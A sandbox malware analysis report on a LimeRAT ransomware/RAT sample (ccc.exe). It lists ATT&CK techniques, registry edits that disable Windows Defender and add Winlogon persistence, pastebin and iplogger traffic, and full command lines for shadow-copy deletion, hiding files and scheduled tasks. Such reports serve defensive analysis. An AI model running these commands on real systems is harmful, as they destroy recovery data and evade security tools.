Malware Analysis Report

2024-09-11 10:21

Sample ID 240618-zrnlnswerh
Target ccc.exe
SHA256 61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e
Tags
limerat defense_evasion evasion execution impact persistence ransomware rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61c5f76ed94eb63ad3a50b8225f2e795c7c6461e5f40bacb4ad8cadab276748e

Threat Level: Known bad

The file ccc.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact persistence ransomware rat trojan

Limerat family

Modifies Windows Defender Real-time Protection settings

Modifies security service

Contains code to disable Windows Defender

LimeRAT

Modifies WinLogon for persistence

Deletes shadow copies

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Hide Artifacts: Hidden Files and Directories

Unsigned PE

Enumerates physical storage devices

Disables Windows logging functionality

Interacts with shadow copies

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Uses Volume Shadow Copy service COM API

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Windows Management Instrumentation
T1047
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Winlogon Helper DLL
T1547.004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Winlogon Helper DLL
T1547.004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Scheduled Task
T1053.005
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Indicator Removal
T1070
File Deletion
T1070.004
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Direct Volume Access
T1006
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Inhibit System Recovery
T1490
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-18 20:57

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Limerat family

limerat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-18 20:57

Reported

2024-06-18 21:00

Platform

win10v2004-20240611-en

Max time kernel

164s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ccc.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe\"" C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A

Enumerates physical storage devices

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Branding\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3336 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 4644 wrote to memory of 2764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4644 wrote to memory of 2764 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4644 wrote to memory of 744 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 4644 wrote to memory of 744 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\attrib.exe
PID 3336 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3336 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3336 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 4896 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 3336 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\cmd.exe
PID 1608 wrote to memory of 2060 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1608 wrote to memory of 2060 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2016 wrote to memory of 1528 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2016 wrote to memory of 1528 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4116 wrote to memory of 4796 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4116 wrote to memory of 4796 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4920 wrote to memory of 4676 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4920 wrote to memory of 4676 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4896 wrote to memory of 2196 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4896 wrote to memory of 2196 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5100 wrote to memory of 2004 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5100 wrote to memory of 2004 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 972 wrote to memory of 1176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 972 wrote to memory of 1176 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4368 wrote to memory of 2768 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4368 wrote to memory of 2768 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1200 wrote to memory of 2736 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1200 wrote to memory of 2736 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2924 wrote to memory of 3860 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2924 wrote to memory of 3860 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4228 wrote to memory of 896 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4228 wrote to memory of 896 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5020 wrote to memory of 4036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5020 wrote to memory of 4036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4656 wrote to memory of 740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4656 wrote to memory of 740 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3336 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3336 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3336 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\schtasks.exe
PID 3336 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\ccc.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ccc.exe

"C:\Users\Admin\AppData\Local\Temp\ccc.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:39" /sc daily /mo "2" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "07:55" /sc daily /mo "4" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "17:29" /sc daily /mo "5" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "15:00" /sc weekly /mo "3" /d "Tue" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:57" /sc monthly /m "may" /tn "MNO Metadata Parser" /tr "'explorer'https://bit.ly/3iVN7Vd"

C:\Users\Admin\AppData\Roaming\Branding\svchost.exe

"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 ftp.encompossoftware.com udp
US 64.40.144.30:21 ftp.encompossoftware.com tcp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
US 64.40.144.30:49154 ftp.encompossoftware.com tcp
US 8.8.8.8:53 30.144.40.64.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.example.com udp
US 93.184.215.14:443 www.example.com tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 14.215.184.93.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 tcp

Files

memory/3336-1-0x0000019D64BA0000-0x0000019D64BE2000-memory.dmp

memory/3336-0-0x00007FF8DA3A3000-0x00007FF8DA3A5000-memory.dmp

memory/2420-2-0x0000021AE9620000-0x0000021AE9642000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b53ab1jv.25w.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
